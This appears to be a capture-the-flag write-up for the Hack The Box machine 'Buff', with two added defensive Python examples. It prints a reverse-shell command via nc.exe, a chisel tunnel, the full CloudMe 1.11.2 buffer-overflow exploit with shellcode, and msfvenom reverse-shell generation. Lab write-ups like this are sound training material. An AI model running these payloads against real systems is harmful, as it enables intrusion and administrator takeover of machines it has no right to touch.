Buff HTB
IP
10.10.10.198
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.198 | grep -E '^[0-9]+/tcp' | cut -d"/" -f1 | tr '\n' ','
The scan shows a single open port on the target:
8080
Let's get more information on that port with default scripts and version detection
sudo nmap -sCV -p8080 10.10.10.198 -oA nmap_results
Results:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 06:16 EST
Nmap scan report for 10.10.10.198
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds
Browsing to port 8080 we land on the site's home page (titled "mrb3n's Bro Hut" in the nmap output).

Let's get feroxbuster running and see if we can find any hidden web pages
feroxbuster -u http://10.10.10.198:8080 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js -o dirs.txt
Hunting around the website, contact.php reveals which software the web app is built on.
Searching for known vulnerabilities in that software turns up a public exploit that gives us a shell on the target:
python2 exploit.py http://10.10.10.198:8080/
We now have a shell on the target machine

This shell has limited functionality, so let's upload nc.exe and upgrade it.
First, start an SMB server on our local machine:
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support
Copy nc.exe over to the target (from our shell):
copy \\10.10.14.3\shrek123\nc.exe
Now start a listener:
rlwrap -cAr nc -lvnp 9001
Execute nc.exe to get our new shell:
.\nc.exe -e cmd.exe 10.10.14.3 9001
We have our shell

Checking netstat we can see two ports that are listening only on localhost:
netstat -ano
3306 - MySQL
8888 - XAMPP stack (our first guess; the process on this port turns out to be CloudMe, see below)

Next, let's grab the process ID listening on port 8888 (6044 here) with findstr, then look that PID up in the task list.
The PID changes every couple of seconds, so run the two commands back to back and use the most recent PID:
netstat -ano | findstr 8888
tasklist /v | findstr 6044
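As an added example (not part of the original writeup), here is a small Python helper that does what the netstat/tasklist pair above does by hand: it parses `netstat -ano` output for TCP listeners, keeps only the ones bound to a loopback address, and joins each to its image name from `tasklist`. Loopback-only services never appear in an external port scan, so a host-side inventory like this is how a defender finds and patches them. Both outputs embedded below are constructed samples (modelled on the numbers in this writeup, not captured from the box), and the function names are my own.

```python
import re

# Constructed sample of `netstat -ano` output (not a capture from the box).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2012
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2440
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6044
  TCP    [::1]:8888             [::]:0                 LISTENING       6044
  TCP    10.10.10.198:8080      10.10.14.3:51234       ESTABLISHED     2012
  UDP    0.0.0.0:5353           *:*                                    1300
"""

# Constructed sample of `tasklist` output (PID -> image name).
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
svchost.exe                    904 Services                   0     10,000 K
httpd.exe                     2012 Services                   0     20,000 K
mysqld.exe                    2440 Services                   0     50,000 K
CloudMe.exe                   6044 Console                    1     30,000 K
"""

# Only TCP sockets in LISTENING state carry a state column we can key on.
TCP_LISTEN = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
TASK_LINE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+\s*K\s*$")
LOOPBACK = {"127.0.0.1", "[::1]"}


def parse_listeners(netstat_text):
    """Return (local_addr, port, pid) for every TCP socket in LISTENING state."""
    found = []
    for line in netstat_text.splitlines():
        m = TCP_LISTEN.match(line)
        if m:
            found.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return found


def parse_tasklist(tasklist_text):
    """Map PID -> image name from `tasklist` output (header rows do not match)."""
    images = {}
    for line in tasklist_text.splitlines():
        m = TASK_LINE.match(line)
        if m:
            images[int(m.group(2))] = m.group(1)
    return images


def pids_for_port(netstat_text, port):
    """Equivalent of `netstat -ano | findstr <port>`, restricted to listeners."""
    return sorted({pid for _, p, pid in parse_listeners(netstat_text) if p == port})


def loopback_only_listeners(netstat_text, tasklist_text):
    """Listeners bound to a loopback address, joined to the owning image name.

    Duplicate (port, pid) pairs from IPv4 and IPv6 sockets collapse to one row.
    """
    images = parse_tasklist(tasklist_text)
    rows = {}
    for addr, port, pid in parse_listeners(netstat_text):
        if addr in LOOPBACK:
            rows[(port, pid)] = images.get(pid, "<unknown>")
    return sorted((port, pid, img) for (port, pid), img in rows.items())


if __name__ == "__main__":
    for port, pid, image in loopback_only_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"localhost:{port}  pid={pid}  image={image}")
```

On a live host you would feed the real `netstat -ano` and `tasklist` output into the two parsers; the same join is what the manual `findstr` steps above do, minus the race with a PID that keeps changing.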

We can see an .exe file being executed; let's see if we can find it.
Looking through the user shaun's directory, we find it in the Downloads directory.

Next, let's check for known vulnerabilities in this program:
searchsploit CloudMe
The version of CloudMe on the target is 1.11.2.
To exploit this service we need to tunnel from our local machine to the target's localhost port; we can use chisel for this, specifically the Windows .exe build on the target side.
We transfer it via our SMB server into the /programdata directory (C:\ProgramData, where we are staging files):
copy \\10.10.14.3\shrek123\chisel_1.9.1_windows_amd64 c.exe
Now run the Linux binary on our local machine in server mode:
chmod +x chisel_1.9.1_linux_amd64
sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
Next, from the target machine, run chisel as the client so that the target's local port 8888 is exposed on port 8888 of our machine:
.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888
Running netstat on our local machine we should now see that we are listening on port 8888:
netstat -ano | grep 8888

Now that chisel is set up, let's look at the exploit:
searchsploit -m windows/remote/48389.py
The exploit:
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
# Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"  # reached through the chisel tunnel set up above
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))  # filler so the buffer is exactly 1500 bytes
buf = padding1 + EIP + NOPS + payload + overrun
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    print(e)
Reading through it, the exploit does two things: it opens a connection to the target on port 8888, then it sends a single crafted buffer. Pretty simple, right?
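An added example from the defender's side, not from the original writeup or the exploit author: the IDS-style check you would run on traffic to a service like this. The classic signal for an overflow payload is a long run of single-byte NOPs (0x90) inside a large, mostly non-printable blob, which is exactly the shape of the buffer the PoC above sends. The payloads below are constructed samples (the "overflow-shaped" one copies only the layout, with placeholder bytes instead of any address or shellcode), the connection records are constructed, and `MAX_NOP_RUN` is an assumed tuning value.

```python
# Constructed samples, not captured traffic. SAMPLE_OVERFLOW mirrors only the
# layout of the PoC above (sled, 4-byte address slot, short sled, opaque blob,
# filler to 1500 bytes) using placeholder bytes throughout.
SAMPLE_BENIGN = b'{"cmd":"sync","file":"notes.txt","size":1024}'
SAMPLE_BULK_TEXT = b"A" * 2000  # large but plain text, e.g. a file upload
SAMPLE_OVERFLOW = (
    b"\x90" * 1052          # placeholder for the first padding block
    + b"BBBB"               # placeholder for the saved-return-address slot
    + b"\x90" * 30          # second, short sled
    + bytes(range(1, 101))  # opaque placeholder blob (contains no 0x90 bytes)
    + b"C" * (1500 - 1052 - 4 - 30 - 100)
)

NOP = 0x90
MAX_NOP_RUN = 16  # assumed tuning value; classic IDS rules fire on roughly 14-32 NOPs


def longest_run(data, byte):
    """Length of the longest consecutive run of `byte` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        if cur > best:
            best = cur
    return best


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII (text protocols score ~1.0)."""
    if not data:
        return 1.0
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / len(data)


def inspect_payload(data, max_nop_run=MAX_NOP_RUN):
    """Score one application-layer payload for overflow indicators."""
    run = longest_run(data, NOP)
    ratio = printable_ratio(data)
    reasons = []
    if run >= max_nop_run:
        reasons.append(f"nop sled of {run} bytes")
    if ratio < 0.5 and len(data) >= 512:
        reasons.append(f"large binary blob ({len(data)} bytes, {ratio:.0%} printable)")
    return {
        "size": len(data),
        "longest_nop_run": run,
        "printable_ratio": round(ratio, 2),
        "flagged": bool(reasons),
        "reasons": reasons,
    }


def flag_connections(records, max_nop_run=MAX_NOP_RUN):
    """Run inspect_payload over (src, dst_port, payload) tuples; return the flagged ones."""
    hits = []
    for src, dst_port, payload in records:
        verdict = inspect_payload(payload, max_nop_run)
        if verdict["flagged"]:
            hits.append((src, dst_port, verdict["reasons"]))
    return hits


# Constructed connection records for a service that expects short text messages.
SAMPLE_RECORDS = [
    ("10.0.0.5", 8888, SAMPLE_BENIGN),
    ("10.0.0.6", 8888, SAMPLE_BULK_TEXT),
    ("10.0.0.7", 8888, SAMPLE_OVERFLOW),
]

if __name__ == "__main__":
    for src, port, reasons in flag_connections(SAMPLE_RECORDS):
        print(f"ALERT {src} -> :{port}: {'; '.join(reasons)}")
```

Two separate indicators are combined on purpose: a length-only rule would alert on every large upload (the bulk-text sample), while the NOP-run rule alone can miss sleds built from multi-byte no-op instructions, so the printable-ratio check gives a second, independent reason to look at the flow. Note that on this box the traffic arrives over loopback through the tunnel, which is exactly why host-based telemetry matters for services bound to 127.0.0.1.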
We can use msfvenom to generate our own payload: a stageless reverse TCP shell (stageless so we can catch it with plain nc):
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9010 -b '\x00\x0A\x0D' -f python -v payload
Now replace the payload in the existing exploit with the one msfvenom just generated.

Now start our nc listener:
nc -lvnp 9010
and run the exploit:
python 48389.py
We now have a shell as administrator on the target machine
